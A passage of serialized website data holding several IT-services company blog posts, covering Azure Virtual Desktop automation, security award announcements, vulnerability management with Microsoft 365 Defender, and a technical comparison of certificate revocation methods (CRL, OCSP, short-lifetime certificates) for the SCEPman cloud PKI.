and AVD hosts enables particularly large synergies.",[12,4210,4211],{},"The customized images are then stored in a compute gallery and used to deploy the pools. This process can be parallelized for multiple host pools with different images as well as performed as often as required to always create an up-to-date version.",[12,4213,4214],{},"From the customer AVD workspace to the profile shares and the hosts themselves, everything is created completely automatically using Terraform code in pipelines. The profile shares can be created without direct line-of-sight to the ADDS, and no management client/server is required. Everything is done directly during the automated code deployment, with no manual steps required.",[12,4216,4217],{},"When adjusting pool sizes later on, our AVD Manager takes over the automated management of AAD and Intune objects.",[2642,4219],{"src":4220,"alt":4221},"https://res.cloudinary.com/c4a8/image/upload/v1681651495/blog/pics/img-avd-foundation-infrastructure.png","AVD Foundation Infrastructure",[12,4223,4224],{},"If you are tired of semi-automated AVD environments or semi-productive states, don't hesitate to contact us. We will be happy to present our sophisticated AVD Foundation solution in detail and show you how it can revolutionize your everyday work.",{"title":65,"searchDepth":111,"depth":111,"links":4226},[4227,4228,4229],{"id":4175,"depth":329,"text":4176},{"id":4186,"depth":329,"text":4187},{"id":4201,"depth":329,"text":4202},{"lang":2171,"titleClass":2173,"categories":4231,"blogtitlepic":4233,"socialimg":4234,"customExcerpt":4235,"hreflang":4236},[4232],"Azure","head-avd-foundation","/blog/heads/head-avd-foundation.jpg","Discover a unique solution for Azure Virtual Desktop (AVD) - the AVD Foundation! With Infrastructure-as-Code (IaC) and Terraform, we offer standardized and automated solutions for Personal and Pooled Hosts. Learn how to quickly build, optimize and scale your AVD environment to meet the needs of your business. Put an end to semi-automated environments and semi-productive states - improve your daily work with AVD Foundation!",[4237],{"lang":2260,"href":4238},"/blog/azure/avd/terraform/2023/04/azure-virtual-desktop","2023-04-24","/posts/2023-04-24-azure-virtual-desktop",{"title":4163,"description":4169},"posts/2023-04-24-azure-virtual-desktop",[4232,4244,4245],"Terraform","AVD","K0ySd0HsOfH3n0kKtXB8yOAlqGhat5F2VyY5lHC9O6Q",{"id":4248,"title":4249,"author":4250,"body":4251,"cta":2166,"description":4255,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":4307,"moment":4239,"navigation":2181,"path":4315,"seo":4316,"stem":4317,"tags":4318,"webcast":2168,"__hash__":4320},"content_en/posts/2023-04-24-security-excellence-awards.md","Top-5 MSSPs Worldwide – Security Elite Honored during RSA 2023",[2461],{"type":9,"value":4252,"toc":4300},[4253,4256,4260,4263,4267,4270,4274,4277,4281,4284,4288,4291],[12,4254,4255],{},"We are thrilled to announce that we are among the top 5 worldwide in the category \"Managed Security Service Provider (MSSP) of the Year\" at the Microsoft Security Excellence Awards 2023. This award is a testament to the tireless efforts and expertise of our Cloud Security Operations Center (CSOC) and our innovative MXDR service offering.",[186,4257,4259],{"id":4258},"a-convergence-of-security-pioneers","A Convergence of Security Pioneers",[12,4261,4262],{},"The Microsoft Security Excellence Awards will take place at the RSA Conference 2023 in San Francisco. The prestigious event recognizes the achievements of the world's top security companies over the past year among members of the Microsoft Intelligent Security Association (MISA). MISA is a powerful alliance that brings together Microsoft executives, subject matter experts, independent software vendors and MSSPs to address the ever-growing cyber threats we face today.",[186,4264,4266],{"id":4265},"our-cutting-edge-mxdr-service","Our Cutting-Edge MXDR Service",[12,4268,4269],{},"Our MXDR service offering, led by our dedicated CSOC team, consists of a comprehensive Security Operations Center (SOC) that provides 24/7/365 proactive search, monitoring, and response capabilities. This advanced solution, deeply integrated with the Microsoft security platform, fuses expert-trained technology with human-led services and has been vetted by Microsoft engineers themselves.",[186,4271,4273],{"id":4272},"a-hub-of-security-excellence","A Hub of Security Excellence",[12,4275,4276],{},"Located in Germany, our Cloud Security Operations Center houses experienced and certified security engineers with extensive technical IT security knowledge. We support a wide range of IT infrastructures for our enterprise customers, including OT/IoT, on-premises, and various cloud environments. Our CSOC uses state-of-the-art Microsoft security tools to monitor all systems in enterprise environments, including Checkpoint, CISCO, Fortinet, Windows Servers & Clients, Office 365, Citrix, SAP, and Linux.",[186,4278,4280],{"id":4279},"a-german-achievement-in-cyber-security","A German Achievement in Cyber Security",[12,4282,4283],{},"We are honored to be the only German finalist in the \"Managed Security Service Provider (MSSP) of the Year\" category. This award underscores our unwavering commitment to delivering world-class security services and solutions to our globally distributed customers.",[186,4285,4287],{"id":4286},"conclusion","Conclusion",[12,4289,4290],{},"As we celebrate our success at the Microsoft Security Excellence Awards 2023, we express our gratitude to the entire MISA community for their steadfast dedication to ensuring the security of our shared customers. We remain committed to delivering pioneering security services and solutions and look forward to the future innovations and milestones we'll achieve together.",[12,4292,4293,4294,4299],{},"For more information about our MXDR Service, please ",[2672,4295,4298],{"href":4296,"style":4297},"/en/security/cloud-security-operations-center","color: #FCD116;","visit our website."," We are looking forward to hearing form you!",{"title":65,"searchDepth":111,"depth":111,"links":4301},[4302,4303,4304,4305,4306],{"id":4258,"depth":329,"text":4259},{"id":4265,"depth":329,"text":4266},{"id":4272,"depth":329,"text":4273},{"id":4279,"depth":329,"text":4280},{"id":4286,"depth":329,"text":4287},{"lang":2171,"titleClass":2173,"categories":4308,"blogtitlepic":4309,"socialimg":4310,"customExcerpt":4311,"hreflang":4312},[2962],"head-misa-excellence-award","/blog/heads/head-misa-excellence-award.jpg","glueckkanja has secured an impressive top 5 spot in the highly competitive Security MSSP of the Year category at the 2023 Microsoft Security Excellence Awards. This prestigious award is a testament to the tireless dedication and expertise of our Cloud Security Operations Center (CSOC), as well as the groundbreaking innovations behind our MXDR service offering.",[4313],{"lang":2260,"href":4314},"/blog/award/csoc/event/security/2023/04/security-excellence-awards","/posts/2023-04-24-security-excellence-awards",{"title":4249,"description":4255},"posts/2023-04-24-security-excellence-awards",[2972,3660,4319,2176],"Events","yS4ouM0f3AfaMQKzdW5oLg2J6tDTRKg-yvCVXXwcBbI",{"id":4322,"title":4323,"author":4324,"body":4325,"cta":2166,"description":4329,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":4387,"moment":4388,"navigation":2181,"path":4397,"seo":4398,"stem":4399,"tags":4400,"webcast":2168,"__hash__":4402},"content_en/posts/2023-05-04-isg-2023.md","Leader for Microsoft 365 Services and Managed Azure",[2461],{"type":9,"value":4326,"toc":4383},[4327,4330,4334,4337,4342,4353,4359,4363,4366,4369,4380],[12,4328,4329],{},"When it comes to being a leader in the world of managed services for Microsoft 365 and Azure, one name keeps popping up in the industry: glueckkanja. The company has once again secured its place as a Leader in ISG's 2023 study, proving that it continues to expand its expertise and commitment.",[186,4331,4333],{"id":4332},"microsoft-365-services-focused-on-customer-needs","Microsoft 365 Services: Focused on customer needs",[12,4335,4336],{},"The Workplace Services from glueckkanja are specifically tailored to the needs of customers with more than 1,000 users. In doing so, the company relies on a vision and implementation strategy that fits seamlessly into the requirements of its customers. The success of this strategy is also reflected in the growing new customer business.",[4338,4339,4341],"h4",{"id":4340},"strengths-at-a-glance","Strengths at a glance",[1254,4343,4344,4347,4350],{},[1257,4345,4346],{},"Customer focus: glueckkanja is committed to providing its customers with practical benefits and supports them, for example, in time-consuming tasks such as the distribution and management of software certificates in the cloud.",[1257,4348,4349],{},"Clear objective: With the claim to become the leading provider of managed services for Microsoft Workplace and Azure Datacenter in the German SME sector, glueckkanja has set itself a clear objective and is consistently pursuing it.",[1257,4351,4352],{},"Technology at the service of customers: The use of Windows Platform and Windows Enterprise Clients with the functions for collaboration and the protection provided by Microsoft 365 Defender enables users to be productive wherever they need to work.",[12,4354,4355],{},[2642,4356],{"alt":4357,"src":4358},"Leader Microsoft 365","https://res.cloudinary.com/c4a8/image/upload/v1683195538/blog/pics/img-isg-m365-badge.jpg",[186,4360,4362],{"id":4361},"managed-services-for-azure-success-through-satisfaction-and-security","Managed Services for Azure: Success through satisfaction and security",[12,4364,4365],{},"glueckkanja has managed to position itself as one of Germany's leading partners for managed services on the Azure platform, and in the process has strengthened the trust of its customers.",[4338,4367,4341],{"id":4368},"strengths-at-a-glance-1",[1254,4370,4371,4374,4377],{},[1257,4372,4373],{},"Successful reorganization: the successful completion of the merger enabled the company to achieve a high level of employee satisfaction.",[1257,4375,4376],{},"Strong partnership with Microsoft: with five of the six new Solutions Partner Designations, glueckkanja demonstrates that it meets Microsoft's high requirements and masters optimal software deployment for customers.",[1257,4378,4379],{},"Security in focus: glueckkanja relies 100% on the Microsoft product range for its security concepts and thus avoids unnecessary complexity by foregoing 3rd party solutions.",[12,4381,4382],{},"The ISG Study 2023 once again underscores glueckkanja's impressive position as the industry leader for Microsoft 365 Services and Managed Azure. The combination of customer value, employee satisfaction and technical expertise shows that glueckkanja is the right choice for companies looking for a reliable partner for their Microsoft 365 and Azure needs. With consistent innovation and a close partnership with Microsoft, glueckkanja remains a reliable partner for customers looking for efficient and secure solutions.",{"title":65,"searchDepth":111,"depth":111,"links":4384},[4385,4386],{"id":4332,"depth":329,"text":4333},{"id":4361,"depth":329,"text":4362},{"lang":2171,"titleClass":2173,"date":4388,"categories":4389,"blogtitlepic":4390,"socialimg":4391,"customExcerpt":4392,"keywords":4393,"hreflang":4394},"2023-05-09",[2962],"head-isg-2023","/blog/heads/head-isg-2023.jpg","glueckkanja was reconfirmed as the industry leader for managed services in Microsoft 365 and Azure in ISG's 2023 study. With a clear vision and implementation strategy, a customer-centric approach, and a strong focus on security and employee satisfaction, the company demonstrates that it meets the needs of its customers.","Managed Services solutions, Azure platform, Microsoft 365 Services, efficient IT partnership, German partners, cloud services, customer satisfaction, trust, innovative IT solutions, security and compatibility, problem-oriented strategies, successful software rollouts",[4395],{"lang":2171,"href":4396},"/blog/award/isg/corporate/2023/05/isg-2023","/posts/2023-05-04-isg-2023",{"title":4323,"description":4329},"posts/2023-05-04-isg-2023",[2972,4401],"ISG","u0ywXjJTSAoMluOuFpw2FFsnBIRv9yt4QMVpH8sp7fs",{"id":4404,"title":4405,"author":4406,"body":4407,"cta":2166,"description":4411,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":4477,"moment":4478,"navigation":2181,"path":4487,"seo":4488,"stem":4489,"tags":4490,"webcast":2168,"__hash__":4491},"content_en/posts/2023-05-12-vulnerability-management-defender.md","Vulnerablity Management with Microsoft 365 Defender",[2295],{"type":9,"value":4408,"toc":4471},[4409,4412,4418,4421,4425,4433,4436,4440,4443,4449,4453,4456,4460,4463,4468],[12,4410,4411],{},"We all want to avoid security incidents in IT and therefore need to know our attack surface and reduce it wherever possible. In addition to tools such as Microsoft Defender Vulnerability Management, smooth processes in application management and vulnerability management are particularly helpful.",[12,4413,4414],{},[2642,4415],{"alt":4416,"src":4417},"Secure Score","https://res.cloudinary.com/c4a8/image/upload/v1683885342/blog/pics/img-secure-score.jpg",[12,4419,4420],{},"Looking at the Microsoft 365 Defender Portal, especially Defender for Endpoint, many are amazed at the data collected on vulnerable applications and weak configurations. Who hasn't experienced it? Every month, new update recommendations for Windows 10, Office and Google Chrome pop up in the dashboard. There are around 70 recommendations for secure endpoint configurations on the list as well. The question is how to cope with the countless recommendations and achieve an acceptable Exposure or Secure Score. What would be an acceptable score for an enterprise and how should one measure? To answer these questions, let's first take a look at the various products and scores.",[186,4422,4424],{"id":4423},"features-in-microsoft-365-defender-portal","Features in Microsoft 365 Defender Portal",[12,4426,399,4427,4432],{},[2672,4428,4431],{"href":4429,"rel":4430},"https://security.micosoft.com",[2676],"Microsoft 365 Defender Portal"," contains the overall Secure Score, which covers all areas of the M365 tenant, including endpoints, identities, data, and applications. A high score signals maximum security configurations. Microsoft recommends the most secure configuration of each tool and compares it to the current tenant configuration. Each individual Defender product has its own score (for example, Secure Score for Devices or Identity Secure Score), which is included in the general Secure Score. This score increases as soon as the settings recommended by Microsoft have been correctly implemented or mitigated by alternatives.",[12,4434,4435],{},"With Defender for Endpoint, we get a detailed listing of vulnerabilities on endpoints such as Workplace, Servers and Mobile Devices. This includes vulnerable applications, but also insecure configurations, such as a disabled Attack Surface Reduction Rule. In the future, the Defender for Vulnerability Management add-on will provide even more insights into browser extensions, certificates and firmware data. In addition, vulnerable applications can be blocked in the future.",[186,4437,4439],{"id":4438},"meaning-of-the-secure-score-for-devices-and-the-exposure-score","Meaning of the Secure Score for Devices and the Exposure Score",[12,4441,4442],{},"There are two scores in the Threat & Vulnerability Management (TVM) module of Defender for Endpoint: The Secure Score for Devices is part of the general Secure Score and only evaluates endpoints. The Exposure Score, on the other hand, indicates how vulnerable the devices are. The higher the Exposure Score, the more vulnerabilities there are on the devices. Therefore, the goal is to keep the Exposure Score as low as possible. If Microsoft's recommendations are followed, the Exposure Score decreases and the Secure Score usually increases. The recommendations differ between configuration changes and software updates. It often takes a team of security, workplace, network and server managers to work through the recommendations regarding configurations.",[12,4444,4445],{},[2642,4446],{"alt":4447,"src":4448},"Software Update Cycle","https://res.cloudinary.com/c4a8/image/upload/v1683885775/blog/pics/img-software-updates-cycle.jpg",[186,4450,4452],{"id":4451},"challenges-and-solutions-for-software-updates-and-upgrades","Challenges and solutions for software updates and upgrades",[12,4454,4455],{},"Unfortunately, the recommendations for software updates or upgrades are not so easy to handle. Application vulnerabilities in particular are very volatile - why else would there be a patch day every month? So we will always have a high exposure score due to new software vulnerabilities. Acute measures are often not helpful here; functioning update processes must be implemented in the company.",[186,4457,4459],{"id":4458},"microsoft-defender-external-attack-surface-management","Microsoft Defender External Attack Surface Management",[12,4461,4462],{},"In addition to your own endpoints and servers, there is another large attack surface. Externally accessible systems can be monitored with Microsoft Defender External Attack Surface Management. The unknown vulnerabilities are not a black box, we recommend regular assessments regarding the infrastructure, and a PenTest or Red Teaming events can also reveal unknown attack surfaces.",[12,4464,4465],{},[2642,4466],{"alt":4459,"src":4467},"https://res.cloudinary.com/c4a8/image/upload/v1683886771/blog/pics/img-surface-management.jpg",[12,4469,4470],{},"Microsoft currently offers the possibility of providing a comprehensive overview of its own attack surface and the existing vulnerabilities. However, mitigation or reducing the vulnerabilities requires a great deal of effort and usually new processes.",{"title":65,"searchDepth":111,"depth":111,"links":4472},[4473,4474,4475,4476],{"id":4423,"depth":329,"text":4424},{"id":4438,"depth":329,"text":4439},{"id":4451,"depth":329,"text":4452},{"id":4458,"depth":329,"text":4459},{"lang":2171,"titleClass":2173,"date":4478,"categories":4479,"blogtitlepic":4480,"socialimg":4481,"customExcerpt":4482,"keywords":4483,"hreflang":4484},"2023-05-12",[2176],"head-vulnerability-management","/blog/heads/head-vulnerability-management.jpg","In order to prevent attacks effectively, early detection of security vulnerabilities and their elimination, for example by applying patches, is essential. Given the increasingly narrow time span between the discovery of a security vulnerability and the first attacks targeting it, efficient and well-structured vulnerability management is becoming increasingly important.","IT Security, Microsoft Defender Vulnerability Management, Application Management, Vulnerability Management, Microsoft 365 Defender Portal, Defender for Endpoint, Secure Score, Exposure Score, Configuration, Vulnerable Applications, Defender for Vulnerability Management, Threat & Vulnerability Management, Software Updates, Software Upgrades, Microsoft Defender External Attack Surface Management, Attack Surface, Vulnerability Mitigation, Infrastructure Assessments, PenTest, Red Teaming Events, Update Processes, Patch Day",[4485],{"lang":2260,"href":4486},"/blog/security/csoc/defender365/corporate/2023/05/vulnerability-management-defender","/posts/2023-05-12-vulnerability-management-defender",{"title":4405,"description":4411},"posts/2023-05-12-vulnerability-management-defender",[3660,3395,4029],"n8RNIH3wwtktUennCi-DtZwVyEZXPzZ8q4GOPbtwZbg",{"id":4493,"title":4494,"author":4495,"body":4497,"cta":2166,"description":65,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":4830,"moment":4831,"navigation":2181,"path":4841,"seo":4842,"stem":4843,"tags":4844,"webcast":2168,"__hash__":4847},"content_en/posts/2023-05-15-certificate-revocation.md","Controlling Certificate Lifetime and Revocation",[4496],"Christoph Hannebauer",{"type":9,"value":4498,"toc":4823},[4499,4503,4506,4517,4520,4523,4526,4529,4536,4539,4542,4545,4549,4557,4563,4576,4579,4582,4585,4600,4621,4624,4630,4651,4655,4658,4661,4664,4671,4674,4682,4696,4700,4703,4791,4793,4801,4805,4814],[186,4500,4502],{"id":4501},"certificate-revocation-lists-crls","Certificate Revocation Lists (CRLs)",[12,4504,4505],{},"For a long time, CRLs were the de-facto standard for PKIs. A Certification Authority (CA) regularly issues a list of certificate revocations, each with",[3259,4507,4508,4511,4514],{},[1257,4509,4510],{},"the certificate's serial number,",[1257,4512,4513],{},"the time of revocation, and",[1257,4515,4516],{},"the revocation reason.",[12,4518,4519],{},"The list itself has a creation and expiration date and has a digital signature, most often from the CA. It is published as a file on one or more CRL Distribution Points (CDPs). This used to be an LDAP URL, but nowadays it is often only HTTP. CRLs of Root CAs that only issue Sub CA certificates typically have a validity of 6 to 12 months. Common validity periods for CRLs of Sub CAs are 1 or 2 weeks.",[12,4521,4522],{},"A system usually does not download a CRL on every certificate check. Instead, it relies on cached CRLs downloaded on earlier checks. It downloads a new CRL only shortly before the old one expires. This is because CRLs can become quite large -- CRLs of public CAs may contain many certificates and grow to multiple MB in size.",[12,4524,4525],{},"This has the additional advantage that systems can check certificate validity even during CDP outages. Browsers, email clients, NACs, and so on treat certificates as invalid if they cannot check their revocation status: Attackers could use their stolen and revoked certificates just by interrupting the connection to the CDP. This depends on the settings, though.",[12,4527,4528],{},"On the downside, revocations arrive at participating systems only with some latency. Assume an admin revokes a certificate immediately after the CA issues a CRL with two weeks validity. Then systems relying on this CRL may use the certificate for another two weeks after revocation.",[52,4530,4531],{},[2642,4532],{"src":4533,"alt":4534,"style":4535},"https://res.cloudinary.com/c4a8/image/upload/blog/pics/img-scepman-crl.png","CRL Structure","width: 50%; margin-bottom: 50px;",[12,4537,4538],{},"A modern solution to ensure availability of the CDPs is a Content Delivery Network (CDN), for example, based on Azure Blob Storage. As a best practice for Microsoft CAs, a Scheduled Task regularly issues a new CRL and uploads it to Azure Blob Storage.",[12,4540,4541],{},"SCEPman has a stateless architecture, it has no database on its own for common operations. This has many advantages. It does not require backups. Multiple SCEPman instances run in parallel without any configuration; this enables automatic scale-out to serve during performance peaks. So statelessness is very good for cloud apps, but CRLs are not possible without a database to store the list of revoked certificates. SCEPman 2.4 dynamically generates a CRL for each request on the CDP. The CRL contains only manually revoked certificates, though, analogously to a classic PKI.",[12,4543,4544],{},"Luckily, there is a better alternative for a cloud PKI:",[186,4546,4548],{"id":4547},"online-certificate-status-protocol-ocsp","Online Certificate Status Protocol (OCSP)",[12,4550,4551,4556],{},[2672,4552,4555],{"href":4553,"rel":4554},"https://tools.ietf.org/html/rfc6960#section-2",[2676],"In 1999, OCSP was developed for high security applications"," for which the latency of CRLs was not acceptable. Instead of keeping a list revoked certificates, a system can request the current status of a specific certificate from a so-called OCSP Responder. Thus, verifying the validity of a certificate in real-time requires only a comparably small HTTP request. The part of the OCSP response detailing the status of the requested certificate has the same ASN.1 data structure as a CRL entry: serial number, time of revocation, and revocation reason. Hence, no difference to CRLs here.",[52,4558,4559],{},[2642,4560],{"src":4561,"alt":4562,"style":4535},"https://res.cloudinary.com/c4a8/image/upload/blog/pics/img-ocsp-response.png","OCSP Response",[52,4564,4566],{"style":4565},"margin-bottom: 50px;",[52,4567,424,4569,424,4573],{"style":4568},"background-color: var(--color-yellow); padding: 35px;",[186,4570,4572],{"id":4571},"why-neither-cdp-nor-ocsp-use-https","Why neither CDP nor OCSP use HTTPS",[12,4574,4575],{},"CRL requests from a CDP as well as OCSP requests commonly do not use TLS, i.e. HTTPS, but HTTP. Otherwise, a chicken-and-egg problem could occur, as the certificates used for the TLS connection require validation as well. Of course, the creators of CDPs and OCSP have taken this into account. CRLs as well as OCSP responses have cryptographic signatures from their CA or an accredited authority. This ensures authenticity of the revocation information even through unsecure channels like HTTP.",[12,4577,4578],{},"The low latency of revocation information in OCSP comes with a price. If the OCSP Responders of a CA are down, it is not possibly anymore to check the validity of certificates -- which usually means that all issued certificates become unusable. Therefore, OCSP Responders should be designed for high availability.",[12,4580,4581],{},"In detail, there are some important differences between implementations. For example, Microsoft's OCSP servers use the CRL as revocation data base. This means, when an OCSP request comes in, the OCSP Responders searches for the certificate within the CRL and answers accordingly. Revoking a certificate at the CA does not automatically issue a new CRL, so the OCSP Responder will still claim that the certificate is valid as long as the CRL does. Using OCSP does not automatically give real-time revocation.",[12,4583,4584],{},"SCEPman uses OCSP to control certificate validity. The moment an OCSP request comes in, SCEPman searches for the corresponding object, a device or user, in Azure AD or JAMF database and compares whether it matches the configured requirements. For example, if a computer object in AAD is disabled or deleted, its certificate becomes invalid immediately. This way, our users can revoke certificates without latency and even without the tedious certificate management required in traditional PKIs.",[12,4586,4587,4588,4593,4594,4599],{},"As pointed out in the last section, SCEPman is stateless -- we achieved this by using AAD and JAMF for certificate information instead of a separate database. This allows an easy high-availability installation of SCEPman, even with ",[2672,4589,4592],{"href":4590,"rel":4591},"https://docs.scepman.com/scepman-configuration/optional/geo-redundancy",[2676],"geo-redundancy",". Microsoft ",[2672,4595,4598],{"href":4596,"rel":4597},"https://azure.microsoft.com/en-us/support/legal/sla/app-service",[2676],"guarantees 99.95% uptime for their Azure App Services",", so even with a single instance, the VPN Gateway or WiFi NAC might fail more often than the OCSP Responder. While the high availability necessary for OCSP can be a blocker for on-premises PKIs, it is no problem when using SCEPman.",[12,4601,4602,4603,4608,4609,4614,4615,4620],{},"Even with SCEPman, some certificates are not linked to a directory object or an administrator wants to revoke them independently of the directory object's state. Examples are ",[2672,4604,4607],{"href":4605,"rel":4606},"https://docs.scepman.com/certificate-deployment/static-certificates/mosyle",[2676],"certificate enrollment with Mosyle"," -- unless you ",[2672,4610,4613],{"href":4611,"rel":4612},"https://docs.scepman.com/advanced-configuration/application-settings/staticaad-validation",[2676],"link these certificates to AAD objects"," -- or ",[2672,4616,4619],{"href":4617,"rel":4618},"https://docs.scepman.com/certificate-deployment/certificate-master",[2676],"server certificates",". For these special cases, SCEPman uses a database, specifically an Azure Storage Account with Table Storage. SCEPman requires only read access to the database for OCSP, Table Storage is non-relational, and even in the cheapest SKU three-times redundant, so replications and backups are not necessary. SCEPman uses the database as a source of revocation information in parallel to a possible MDM directory. If needed, SCEPman may still store issued certificates in the database to allow easy manual revocation in addition to automatic revocation.",[12,4622,4623],{},"The following diagram illustrates how OCSP works in a SCEPman setup on three distributed App Service instances:",[12,4625,4626],{},[2642,4627],{"alt":4628,"src":4629},"OCSP verification in a geo-redundant SCEPman setup","https://res.cloudinary.com/c4a8/image/upload/v1684157027/blog/pics/img-scepman-ocsp-structure-chart.png",[12,4631,4632,4633,4638,4639,4644,4645,4650],{},"When a client (which in this case need not to be an end-user device, but possibly a RADIUS server like ",[2672,4634,4637],{"href":4635,"rel":4636},"https://www.radius-as-a-service.com/",[2676],"RADIUS-as-a-Service",") wants to check whether a certificate is still valid, it uses the DNS-based Azure Traffic Manager to find a healthy and nearby SCEPman instance and then sends the OCSP request to that instance. The chosen SCEPman instance queries both Azure Storage and in this case Intune in parallel to check whether the device object linked to the certificate is there and in a good state. The OCSP response reflects these results. A single Azure Storage instance suffices, as it is always redundant. The level of redundancy ",[2672,4640,4643],{"href":4641,"rel":4642},"https://learn.microsoft.com/en-us/azure/storage/common/storage-redundancy",[2676],"depends on the selected SKU",". Both, Azure Key Vault and MEM/Intune are ",[2672,4646,4649],{"href":4647,"rel":4648},"https://learn.microsoft.com/en-us/azure/key-vault/general/disaster-recovery-guidance",[2676],"redundant without extra configuration",". The SCEPman instances do not communicate with each other and clients do not establish ongoing sessions with SCEPman instances for OCSP requests, so no cookies or the like are involved. Therefore, SCEPman instances can be added or removed as required.",[186,4652,4654],{"id":4653},"short-lifetime-certificates","Short Lifetime Certificates",[12,4656,4657],{},"In some applications, it is an advantage to have no revocation check at all. For example, systems completely without network connection and therefore without contact to CDP or OCSP Responder. Or checking the validity requires interaction with the certificate holder and therefore only the certificate holder can initiate the check, but not the CA. Attackers might still compromise these certificates and PKIs must limit the damage by invalidating the certificates.",[12,4659,4660],{},"These are cases for Short Lifetime Certificates: Certificates with a short validity period, only days or hours. It is not necessary to revoke these certificates, as a compromised certificate becomes invalid after a short time -- often faster than one revoked on a CRL.",[12,4662,4663],{},"The simpler architecture has some more additional advantages: It requires no planning or operations for CDP and OCSP Responder. Certificate usage does not require network usage. Management of these certificates can be cut down because of their low value.",[12,4665,4666,4667,4670],{},"A pitfall is that a PKI ",[3456,4668,4669],{},"should"," not manage these certificates. Because of their short validity, a CA issues much more of them than compared to long-lived certificates. When storing Short Lifetime Certificates in a database nevertheless, it will grow quickly to a large size for which it is not made. Microsoft's CA therefore offers a setting in certificate templates to not even store these certificates. Note that you have to set the compatibility level of the certificate template to Windows Server 2008 R2 or newer, which is not the default.",[12,4672,4673],{},"For WiFi and VPN client certificates, Short Lifetime Certificates are unsuited. Connecting to the network requires a valid certificate; in order to get a new certificate, the client needs a network connection. This is not a problem if the client renews its certificates long enough before its expiration. Microsoft Intune and JAMF in conjunction with SCEPman do this automatically. A traditional Microsoft CA with auto enrollment also supports this without user interaction. When using Short Lifetime Certificates, a machine slips into this vicious circle of missing network connection and missing certificate when its user is on vacation for a week and the device is turned of during this time.",[12,4675,4676,4681],{},[2672,4677,4680],{"href":4678,"rel":4679},"https://letsencrypt.org/2015/11/09/why-90-days.html",[2676],"Let's Encrypt issues TLS certificates with shorter lifetimes"," than common for other CAs. For servers, this is no issue, as they are always connected and use automated certificate issuance.",[12,4683,4684,4685,4690,4691,1013],{},"For the same reasons, SCEPman recommends Short Lifetime Certificates also only for servers. Starting with SCEPman v1.7, customers can configure the certificate validity per endpoint. Thus, they can use OCSP for client certificates with longer validity, while automatically issuing and renewing Short Lifetime ",[2672,4686,4689],{"href":4687,"rel":4688},"https://docs.scepman.com/certificate-deployment/other-1/domain-controller-certificates",[2676],"Domain Controller certificates",". Furthermore, we recommend short lifetimes for additional systems supplied with certificates via the ",[2672,4692,4695],{"href":4693,"rel":4694},"https://docs.scepman.com/certificate-deployment/other-1/static-certificates",[2676],"static SCEP endpoint",[186,4697,4699],{"id":4698},"summary","Summary",[12,4701,4702],{},"Each revocation method has advantages and disadvantages, so the choice depends on the context. For a traditional on-premises infrastructure PKI, CRLs are a good choice, because they are easy to implement. For a modern cloud PKI like SCEPman, OCSP is better because it allows revocations in real time and a cloud-friendly stateless implementation. Short Lifetime Certificates have more specialized use cases and can be mixed with CRLs or OCSP within a single PKI. Then, the choice depends on the type of certificate. The following table summarizes some of the most important aspects of the three techniques:",[417,4704,420,4705],{},[438,4706,4707,420,4722,420,4738,420,4752,420,4765,420,4777],{},[426,4708,424,4710,424,4713,424,4716,424,4719,420],{"style":4709},"background-color: var(--color-black-30); border-bottom: 1px solid var(--color-black-50);",[430,4711],{"style":4712},"padding: 5px;",[430,4714,4715],{"style":4712},"CRL",[430,4717,4718],{"style":4712},"OCSP",[430,4720,4721],{"style":4712},"Short Lifetime",[426,4723,424,4725,424,4729,424,4732,424,4735,420],{"style":4724},"border-bottom: 1px solid var(--color-black-30);",[443,4726,4728],{"style":4727},"vertical-align: top; padding: 5px;","Latency",[443,4730,4731],{"style":4727},"Until next CRL update, typically 1-2 weeks at most",[443,4733,4734],{"style":4727},"0-3 minutes in good implementations",[443,4736,4737],{"style":4727},"Until natural expiration, typically 1-14 days",[426,4739,424,4740,424,4743,424,4746,424,4749,420],{"style":4724},[443,4741,4742],{"style":4727},"Required Availability",[443,4744,4745],{"style":4727},"Low",[443,4747,4748],{"style":4727},"High",[443,4750,4751],{"style":4727},"None",[426,4753,424,4754,424,4757,424,4760,424,4763,420],{"style":4724},[443,4755,4756],{"style":4727},"Architectural Complexity",[443,4758,4759],{"style":4727},"Medium (DB required)",[443,4761,4762],{"style":4727},"Medium to high if a DB is used, otherwise low",[443,4764,4751],{"style":4727},[426,4766,424,4767,424,4770,424,4773,424,4775,420],{"style":4724},[443,4768,4769],{"style":4727},"Revocation Reasons",[443,4771,4772],{"style":4727},"All",[443,4774,4772],{"style":4727},[443,4776,4751],{"style":4727},[426,4778,424,4779,424,4782,424,4785,424,4788,420],{"style":4724},[443,4780,4781],{"style":4727},"Temporary Revocations",[443,4783,4784],{"style":4727},"Yes, but often impractical because of the latency",[443,4786,4787],{"style":4727},"Yes",[443,4789,4790],{"style":4727},"No",[52,4792],{"style":4565},[12,4794,4795,4796,1013],{},"For Public CAs, Apple and Mozilla require CRLs, because OCSP introduces a privacy concern: Each OCSP request tells the OCSP provider which domain is visited from which IP address. This is not a problem for private CAs like SCEPman, because the customer is the OCSP provider and also manages the clients to which SCEPman enrolls certificates, so it gains no additional information. Aaron Gable from Let's Encrypt has ",[2672,4797,4800],{"href":4798,"rel":4799},"https://letsencrypt.org/2022/09/07/new-life-for-crls.html",[2676],"summarized this and explained how Let's Encrypt deals with it",[186,4802,4804],{"id":4803},"the-special-case-of-aad-cba","The Special Case of AAD CBA",[12,4806,4807,4808,4813],{},"A special case is ",[2672,4809,4812],{"href":4810,"rel":4811},"https://learn.microsoft.com/en-us/azure/active-directory/authentication/concept-certificate-based-authentication",[2676],"Certificate-based authentication for Azure AD",", which has entered General Availability state recently. Microsoft has seemingly not used one of the common crypto libraries all of which support OCSP a well as CRLs, and instead re-wrote the cryptographic routines from scratch and only implemented CRL support. Additionally, they do not read the CDP from the certificate, but use one that is separately configured in the Azure Portal. This results in special requirements for this use case in terms of certificate revocation.",[12,4815,4816,4817,4822],{},"This is a case where you can configure ",[2672,4818,4821],{"href":4819,"rel":4820},"https://docs.scepman.com/advanced-configuration/application-settings/crl",[2676],"SCEPman's CDP"," in AAD. When AAD checks revocation, it will use the CRL. Other systems use the OCSP responder with its more up-to-date revocation information and better 